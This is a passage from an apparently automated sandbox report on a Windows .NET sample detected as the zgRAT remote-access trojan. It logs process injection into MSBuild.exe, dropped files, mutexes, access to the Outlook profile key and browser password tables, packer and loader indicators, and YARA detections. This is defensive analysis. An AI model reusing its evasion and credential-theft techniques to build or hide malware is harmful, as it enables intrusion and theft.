                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC82523_2_05AC8252
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC21383_2_05AC2138
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05ACE9693_2_05ACE969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05ACE9783_2_05ACE978
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065184683_2_06518468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065190803_2_06519080
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065126403_2_06512640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065126253_2_06512625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065187B03_2_065187B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0651D9F83_2_0651D9F8
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4A11D05_2_6C4A11D0
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4A85F05_2_6C4A85F0
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4C1C655_2_6C4C1C65
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4A8C605_2_6C4A8C60
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4A78005_2_6C4A7800
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4B60A05_2_6C4B60A0
                  Source: x7myVfh5YS.exe, 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameQijihslqi.exe" vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exe, 00000000.00000002.2017995556.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exe, 00000000.00000000.2013853638.0000000000BC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJessica435Kevin.pdf\ vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exeBinary or memory string: OriginalFilenameJessica435Kevin.pdf\ vs x7myVfh5YS.exe
                  Source: x7myVfh5YS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: x7myVfh5YS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.x7myVfh5YS.exe.6cefb000.2.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, rKp2YfihSiQO2BWnfRg.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, rKp2YfihSiQO2BWnfRg.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, rKp2YfihSiQO2BWnfRg.csCryptographic APIs: 'CreateDecryptor'
                  Source: 3.2.MSBuild.exe.68c0000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformBlock'
                  Source: 3.2.MSBuild.exe.68c0000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.MSBuild.exe.68c0000.6.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/24@3/3
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\c8f0949f2f3d443d
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\d70b9a61f2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\Dmhie.tmpdbJump to behavior
                  Source: x7myVfh5YS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: x7myVfh5YS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Fsgbbtx.tmpdb.3.dr, Hwfklpinvb.tmpdb.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: x7myVfh5YS.exeVirustotal: Detection: 28%
                  Source: x7myVfh5YS.exeReversingLabs: Detection: 28%
                  Source: unknownProcess created: C:\Users\user\Desktop\x7myVfh5YS.exe "C:\Users\user\Desktop\x7myVfh5YS.exe"
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: x7myVfh5YS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: x7myVfh5YS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: x7myVfh5YS.exeStatic file information: File size 1403392 > 1048576
                  Source: x7myVfh5YS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x152200
                  Source: x7myVfh5YS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressedlBjq source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: MSBuild.exe, 00000003.00000002.2357846379.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, GaM8BJiPLPU7o8wNO7B.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  .NET source code contains potential unpacker
                  Source: 0.2.x7myVfh5YS.exe.6cefb000.2.raw.unpack, Program.cs.Net Code: Main System.AppDomain.Load(byte[])
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, M7WPwaNpU0F6D4wMaq.cs.Net Code: abhI2JMR24Sf6NFiMKv System.Reflection.Assembly.Load(byte[])
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 3.2.MSBuild.exe.5a40000.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, BvK8wPBQakvfJfnIbN.cs.Net Code: OUtql2FQC4 System.Reflection.Assembly.Load(byte[])
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 3.2.MSBuild.exe.5c60000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MSBuild.exe.59a0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2353903041.0000000005C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352224373.00000000059A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4256, type: MEMORYSTR
                  Source: d3d9.dll.0.drStatic PE information: section name: .zKW
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEF3C24 push ecx; ret 0_2_6CEF3C37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE42B8 push ebx; ret 3_2_02AE42DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F0DC8 push eax; retf 3_2_058F0DD1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AAEBE7 push ecx; retf 3_2_05AAEBFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05ACDE4C push ebp; iretd 3_2_05ACDE4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3880 push eax; ret 3_2_05AC388A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3860 push eax; ret 3_2_05AC386A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3870 push eax; ret 3_2_05AC387A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3849 push eax; ret 3_2_05AC384A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AC3850 push eax; ret 3_2_05AC385A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05D91536 push esi; iretd 3_2_05D91537
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_06512409 push es; retf 3_2_06512440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065122FA push es; ret 3_2_06512300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_06512385 push es; iretd 3_2_06512388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_065141F7 push edi; retn 000Fh3_2_065141F9
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4C2394 push ecx; ret 5_2_6C4C23A7
                  Source: x7myVfh5YS.exeStatic PE information: section name: .text entropy: 7.61458092589058
                  Source: d3d9.dll.0.drStatic PE information: section name: .text entropy: 6.831697706181067
                  Source: Qqgmpuehc.exe.3.drStatic PE information: section name: .text entropy: 7.1190227316889745
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, RaKTvxcN6pJqqJuoYqO.csHigh entropy of concatenated method names: 'PigSrHe0QN', 'cO2S9fyaha', 'AlOSTDXxtH', 'TX0ShHyVDi', 'Dv7S3Wqr54', 'W9KSwrSyHh', 'VMGS6xboqa', 'Xh7cFh2Qot', 'zgQSoPNmAP', 'XJKSLs7jT8'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, v7tI00oAjWIFjvuM6R.csHigh entropy of concatenated method names: 'JDiub6nFS', 'tm2Rcjrf3', 'f8sbgGqOh', 'JaqxUokJL', 'drkY7v3ok', 'XSeCJs3gB', 'U1saLdWxCFwTY8SSC6d', 'QvaOHGWYLrIHSoi7UUs', 'LS7Sm8WCP32dkNRxn1f', 'YCNKrNWIfQG9CcxTTBx'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'tgkSpUMCCA2xn7HFkpq'
                  Source: 3.2.MSBuild.exe.53f0000.1.raw.unpack, M7WPwaNpU0F6D4wMaq.csHigh entropy of concatenated method names: 'cZASnJBFQ', 'APaZGLfdg', 'hQ7E37ra9', 'e9ZHJa4HJ', 'PIi9AFMowvLpoEOSZka', 'ryBRGFMLusGPMaVp24A', 'Y1yLHuMuXnosdL5QuTw', 'IgL2A0Mw22uq0woUrm2', 'e4SeZ7M6gKAdMbFeivN', 'abhI2JMR24Sf6NFiMKv'
